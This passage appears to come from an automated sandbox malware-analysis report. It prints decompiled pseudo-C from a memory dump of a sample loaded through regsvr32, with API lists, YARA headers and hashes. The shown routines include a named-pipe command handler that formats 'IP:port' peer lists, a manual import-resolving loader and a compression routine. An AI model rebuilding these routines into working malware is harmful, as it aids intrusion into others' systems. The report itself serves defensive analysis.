                                                                                                                                                                        				intOrPtr _t129;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				void* _t133;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				signed short* _t149;
                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed short* _t192;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				signed int _t199;
                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                        				signed int _t203;
                                                                                                                                                                        				signed int _t204;
                                                                                                                                                                        				char _t205;
                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                        				void* _t208;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t221;
                                                                                                                                                                        
                                                                                                                                                                        				_t221 = __fp0;
                                                                                                                                                                        				_t208 = (_t206 & 0xfffffff8) - 0xac;
                                                                                                                                                                        				_v144 = 0;
                                                                                                                                                                        				_v172 = 0;
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t72 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push( *0x49ff804);
                                                                                                                                                                        					_v152 = 0;
                                                                                                                                                                        					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push( &_v160);
                                                                                                                                                                        					_t75 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_push(0x80000);
                                                                                                                                                                        					_push( *0x49ff8bc);
                                                                                                                                                                        					_push( *0x49ff804);
                                                                                                                                                                        					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        						goto L56;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t149 =  *0x49ff8bc; // 0x0
                                                                                                                                                                        						_t80 =  *_t149 & 0x0000ffff;
                                                                                                                                                                        						_t214 = _t80 - 8;
                                                                                                                                                                        						if(_t214 > 0) {
                                                                                                                                                                        							_t81 = _t80 - 9;
                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                        							if(_t81 == 0) {
                                                                                                                                                                        								E049F0962( &_v200);
                                                                                                                                                                        								L12:
                                                                                                                                                                        								_t84 =  &_v200;
                                                                                                                                                                        								L13:
                                                                                                                                                                        								_push(4);
                                                                                                                                                                        								L14:
                                                                                                                                                                        								_push(_t84);
                                                                                                                                                                        								_push(5);
                                                                                                                                                                        								L31:
                                                                                                                                                                        								_pop(_t187);
                                                                                                                                                                        								E049ED1A6(_t187);
                                                                                                                                                                        								L32:
                                                                                                                                                                        								L56:
                                                                                                                                                                        								DisconnectNamedPipe( *0x49ff804);
                                                                                                                                                                        								_push(0);
                                                                                                                                                                        								_pop(0);
                                                                                                                                                                        								if(_v172 == 0) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t87 = _t81;
                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                        								_v204 = 0;
                                                                                                                                                                        								_t88 = E049E171A( &_v204, _t221);
                                                                                                                                                                        								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E049E8BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E049ED1A6(_t188);
									L52:
									E049E8BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E049EA43D(_t203));
									_push(_t203);
									_t189 = 5;
									E049ED1A6(_t189);
									E049E8BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E049EA43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E049EA43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E049EA43D(_t203) + _t203;
										__eflags = _t110;
										E049E9E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E049E171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E049E8BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E049F0962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E049E9B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x49ff8bc; // 0x0
								E049E9EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E049E1DD3(E049E9F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E049E8BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E049E1DD3(E049E9F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E049E9C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E049E9880( *((intOrPtr*)(_t200 + _t148 * 4)), E049EA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E049E5EC3(E049ED1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E049F0940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E049F0940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                        0x049e38c4
                                                                                                                                                                        0x049e38c6
                                                                                                                                                                        0x049e38f5
                                                                                                                                                                        0x049e3904
                                                                                                                                                                        0x049e3909
                                                                                                                                                                        0x049e390c
                                                                                                                                                                        0x049e3918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3918
                                                                                                                                                                        0x049e38c8
                                                                                                                                                                        0x049e38cc
                                                                                                                                                                        0x049e38da
                                                                                                                                                                        0x049e38df
                                                                                                                                                                        0x049e38e3
                                                                                                                                                                        0x049e38e4
                                                                                                                                                                        0x049e38e9
                                                                                                                                                                        0x049e38ed
                                                                                                                                                                        0x049e38ed
                                                                                                                                                                        0x049e38f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e38f1
                                                                                                                                                                        0x049e3815
                                                                                                                                                                        0x049e3818
                                                                                                                                                                        0x049e3860
                                                                                                                                                                        0x049e3861
                                                                                                                                                                        0x049e3864
                                                                                                                                                                        0x049e386c
                                                                                                                                                                        0x049e3871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3871
                                                                                                                                                                        0x049e381b
                                                                                                                                                                        0x049e381e
                                                                                                                                                                        0x049e3847
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3847
                                                                                                                                                                        0x049e3823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e382e
                                                                                                                                                                        0x049e37e7
                                                                                                                                                                        0x049e3b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 049E37B2
                                                                                                                                                                          • Part of subcall function 049ED1A6: FlushFileBuffers.KERNEL32(00000000,?,049E3AC6,00000000,00000004), ref: 049ED1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 049E3B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 465096328-3858738763
                                                                                                                                                                        • Opcode ID: 429bdee1231b7a9518c1bae6c410794e1ab435cef57eaa0de78d66c253201c4e
                                                                                                                                                                        • Instruction ID: 8a9516393a3cfb0569294401719c45921ad77eb35c7f67167658a374100512ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 429bdee1231b7a9518c1bae6c410794e1ab435cef57eaa0de78d66c253201c4e
                                                                                                                                                                        • Instruction Fuzzy Hash: EDA1A1B2608301AFE326EF66D884E3BB7ECEB84314F44493EF95597180EB35E9458B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E049F370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				signed int* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				struct HINSTANCE__* _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        
                                                                                                                                                                        				_t167 = __ecx;
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                        					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                        					_v40 = E049EEFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        					_v32 = _v52;
                                                                                                                                                                        					_t109 = 8;
                                                                                                                                                                        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                        						L24:
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v56 = 0x80000000;
                                                                                                                                                                        					_t112 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_v8 = _v8 + 0x14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t115 = 8;
                                                                                                                                                                        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                        						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                        						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v8 == 0) {
                                                                                                                                                                        								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        								_v12 =  *_t43 + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v12 =  *_v8 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v28 = _v28 & 0x00000000;
                                                                                                                                                                        							while( *_v12 != 0) {
                                                                                                                                                                        								_v24 = _v24 & 0x00000000;
                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                        								_v64 = _v64 & 0x00000000;
                                                                                                                                                                        								_v20 = _v20 & 0x00000000;
                                                                                                                                                                        								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                        									_v60 =  *_v12 + _a4;
                                                                                                                                                                        									_v20 = _v60 + 2;
                                                                                                                                                                        									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v24 =  *_v12;
                                                                                                                                                                        									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                        									_v16 = _v40(_v36, _v20);
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_v24 != _v16) {
                                                                                                                                                                        									_v44 = _v44 + 1;
                                                                                                                                                                        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                        										 *_v12 = _v16;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                        										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								_v12 =  &(_v12[1]);
                                                                                                                                                                        								_v28 = _v28 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v8 = _v8 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t163 = 0xfffffffd;
                                                                                                                                                                        						return _t163;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L24;
                                                                                                                                                                        				}
                                                                                                                                                                        				return __eax | 0xffffffff;
                                                                                                                                                                        			}
























                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 049F3728
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 049F37C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: 8afdc9d98a2a998b930f9ac1a969081a7f015d4a0d296eb7db1b63847098f62b
                                                                                                                                                                        • Instruction ID: 0fa8eb443a2de66faf8807245064ef6443f4dba5135b143ed12fd68e5b0ebce9
                                                                                                                                                                        • Opcode Fuzzy Hash: 8afdc9d98a2a998b930f9ac1a969081a7f015d4a0d296eb7db1b63847098f62b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D617F75E10209EFDB10CF98C885BADBBF1FF48315F2485A9E915AB251D378AA80DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E049F4100(int _a4, signed int _a8) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                        				intOrPtr* _t142;
                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                        				intOrPtr _t161;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t167;
                                                                                                                                                                        				intOrPtr _t170;
                                                                                                                                                                        				signed int _t172;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				int _t184;
                                                                                                                                                                        				intOrPtr _t185;
                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				int _t202;
                                                                                                                                                                        				int _t208;
                                                                                                                                                                        				intOrPtr _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				int _t219;
                                                                                                                                                                        				intOrPtr _t220;
                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                        				signed int _t222;
                                                                                                                                                                        				int _t224;
                                                                                                                                                                        				int _t225;
                                                                                                                                                                        				signed int _t227;
                                                                                                                                                                        				intOrPtr _t228;
                                                                                                                                                                        				int _t232;
                                                                                                                                                                        				int _t234;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				int _t239;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				int _t245;
                                                                                                                                                                        				int _t252;
                                                                                                                                                                        				signed int _t253;
                                                                                                                                                                        				int _t254;
                                                                                                                                                                        				void* _t257;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				int _t259;
                                                                                                                                                                        				intOrPtr _t260;
                                                                                                                                                                        				int _t261;
                                                                                                                                                                        				signed int _t269;
                                                                                                                                                                        				signed int _t271;
                                                                                                                                                                        				intOrPtr* _t272;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        
                                                                                                                                                                        				_t253 = _a8;
                                                                                                                                                                        				_t272 = _a4;
                                                                                                                                                                        				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        				_t228 =  *_t4;
                                                                                                                                                                        				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                        				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_t269 = 0;
                                                                                                                                                                        				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                        					_v12 = 0xffff;
                                                                                                                                                                        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                        					if(_t217 < _t141) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                        					_v8 = _t245;
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                        					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                        					if(_t227 >= _v16) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						if(_t253 != 4) {
                                                                                                                                                                        							L10:
                                                                                                                                                                        							_t269 = 0;
                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t285 = _t227 - _t195;
                                                                                                                                                                        							if(_t227 != _t195) {
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t269 = _t253 - 3;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						E049F7120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                        						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                        						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                        						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                        						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                        						E049F5E80(_t285,  *_t272);
                                                                                                                                                                        						_t202 = _v8;
                                                                                                                                                                        						_t273 = _t273 + 0x14;
                                                                                                                                                                        						if(_t202 != 0) {
                                                                                                                                                                        							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                        							_v8 = _t208;
                                                                                                                                                                        							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t37 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t252 = _v8;
                                                                                                                                                                        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                        							_t227 = _t227 - _t252;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t227 != 0) {
                                                                                                                                                                        							E049F5FC0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t253 = _a8;
                                                                                                                                                                        						if(_t269 == 0) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                        							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                        								goto L7;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					break;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t142 =  *_t272;
                                                                                                                                                                        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                        				_a4 = _t232;
                                                                                                                                                                        				if(_t232 == 0) {
                                                                                                                                                                        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t254 =  *_t83;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        					_t224 =  *_t59;
                                                                                                                                                                        					if(_t232 < _t224) {
                                                                                                                                                                        						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						_t260 =  *_t66;
                                                                                                                                                                        						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                        						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                        							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t261 = _t260 - _t224;
                                                                                                                                                                        							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                        							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                        							_t70 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                        							_t188 =  *_t70;
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t232 = _a4;
                                                                                                                                                                        							__eflags = _t188 - 2;
                                                                                                                                                                        							if(_t188 < 2) {
                                                                                                                                                                        								_t189 = _t188 + 1;
                                                                                                                                                                        								__eflags = _t189;
                                                                                                                                                                        								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                        						_t225 = _a4;
                                                                                                                                                                        						_t273 = _t273 + 0xc;
                                                                                                                                                                        						_t76 = _t272 + 0x6c;
                                                                                                                                                                        						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                        						__eflags =  *_t76;
                                                                                                                                                                        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						_t184 =  *_t78;
                                                                                                                                                                        						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t239 =  *_t79;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                        						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                        						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t184 =  *_t62;
                                                                                                                                                                        						_t273 = _t273 + 0xc;
                                                                                                                                                                        						_t225 = _a4;
                                                                                                                                                                        						_t239 = _t184;
                                                                                                                                                                        						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t254 = _t184;
                                                                                                                                                                        					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                        					_t81 = _t272 + 0x16b4; // 0xed7505f9
                                                                                                                                                                        					_t185 =  *_t81;
                                                                                                                                                                        					_t240 = _t239 - _t185;
                                                                                                                                                                        					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                        					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                        					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t269 == 0) {
                                                                                                                                                                        					_t218 = _a8;
                                                                                                                                                                        					__eflags = _t218;
                                                                                                                                                                        					if(_t218 == 0) {
                                                                                                                                                                        						L34:
                                                                                                                                                                        						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                        						_t219 =  *_t272;
                                                                                                                                                                        						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                        						_a4 =  *_t272;
                                                                                                                                                                        						_t234 = _t254;
                                                                                                                                                                        						_v16 = _t145;
                                                                                                                                                                        						_v8 = _t254;
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                        							_v8 = _t254;
                                                                                                                                                                        							_t95 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							_a4 = _t219;
                                                                                                                                                                        							_t234 = _t254;
                                                                                                                                                                        							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                        							if( *_t95 >=  *_t97) {
                                                                                                                                                                        								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        								_t167 =  *_t98;
